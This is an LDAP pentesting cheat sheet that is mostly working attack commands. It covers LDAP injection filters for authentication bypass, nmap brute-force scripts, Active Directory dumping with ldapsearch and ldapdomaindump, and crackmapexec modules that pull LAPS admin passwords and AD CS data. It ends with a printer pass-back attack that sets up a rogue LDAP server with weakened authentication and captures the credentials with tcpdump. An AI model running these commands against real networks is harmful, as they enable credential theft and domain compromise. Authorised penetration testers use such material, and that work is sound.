Ldap injection

(&uid=)(userPassword=) (&uid=)|(userPassword=) (&uid=)|(objectClass=)(userPassword=password123)

)(uid=))(|(password=*)

LDAP (Lightweight Directory Access Protocol) Pentesting

Enumeration

nmap --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' -p 389 <target-ip>
nmap --script ldap-search -p 389 <target-ip>
nmap --script ldap-* -p 389 <target-ip>
nmap --script "ldap* and not brute" -p 389 <target-ip>
Copied!

Search LDAP

Belows are defined in LDAP.

• cn - Common Name

• dc - Domain Component

• ou - Organizational Unit

# -b: base dn for search
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com"
ldapsearch -x -H ldap://10.0.0.1:636 -b "dc=example,dc=com"

# As administrator
# -D: bind DN
# -w: bind password
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com" -D "cn=admin,dc=example,dc=com" -w password
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com" -D "cn=admin,dc=example,dc=com" -W

# Search sAMAccountName
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com" -D "workspace\\ldap" -w 'password' "(objectclass=*)" "sAMAccountName"
ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com" -D "workspace\\ldap" -w 'password' "(objectclass=*)" "sAMAccountName" | grep sAMAccountName

# Get information
ldapsearch -x -H ldap://10.0.0.1 -b "cn=sample,cn=Users,dc=example,dc=com" -w 'password' "(objectclass=*)" -D "example\\name"
Copied!

Dump Active Directory Information

If you have the credential, you can get the Active Directory information via LDAP.

# --no-html: Disable html output
# --no-grep: Disable greppable output
# -o: Output dir
ldapdomaindump -u 'DOMAIN\username' -p password <target-ip> --no-html --no-grep -o dumped
Copied!

Connect

AD CS (Active Directory Certificate Services)

cd crackmapexec
# -M: module
poetry run crackmapexec ldap <target-ip> -d 'domain' -u 'username' -p 'password' -M adcs
Copied!

LAPS (Local Administrator Password Solution)

cd crackmapexec
# -M: module
poetry run crackmapexec ldap <target-ip> -u 'username' -p 'password' --kdcHost <target-ip> -M laps
Copied!

Pass-Back Attack

Attack against the network devices such as printers. For example, access http://printer.sub.example.com/settings.aspx

Open a listener for connecting back to your local machine.

nc -vp 1389
Copied!

In your browser, test LDAP settings where you input username and password.

Host Rogue LDAP Server

If we cannot connect back in local machine by netcat, we need to create a rogue LDAP server. Install the dependencies at first.

sudo apt update
sudo apt install -y slapd ldap-utils
sudo systemctl enable slapd
Copied!

Configure your own rogue LDAP server by executing the following command.

sudo dpkg-reconfigure -p low slapd

# ---------------------------------------------------

# in configuration dialog

1. Omit OpenLDAP server configuration: No
2. DNS domain name: <target-domain>
3. Organization name: <target-domain>
4. Administrator password: <arbitrary-password>
5. Database backend to use: MDB
6. Do you want the database to be removed when slapd is purged?: No
7. Move old database?: Yes
Copied!

We need to make your rogue LDAP server to be vulnerable by downgrading the supported authentication mechanism. Create the config file named "config.ldif".

dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
Copied!

Now we can use the config file to patch the LDAP server.

# -Y: SASL mechanism
# -H: URI
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./config.ldif
sudo service slapd restart
Copied!

We can verify that the rogue LDAP server’s configuration has been applied:

ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
Copied!

For capturing the credentials, run the following command.

sudo tcpdump -SX -i <target-interface-like-eth0> tcp port 389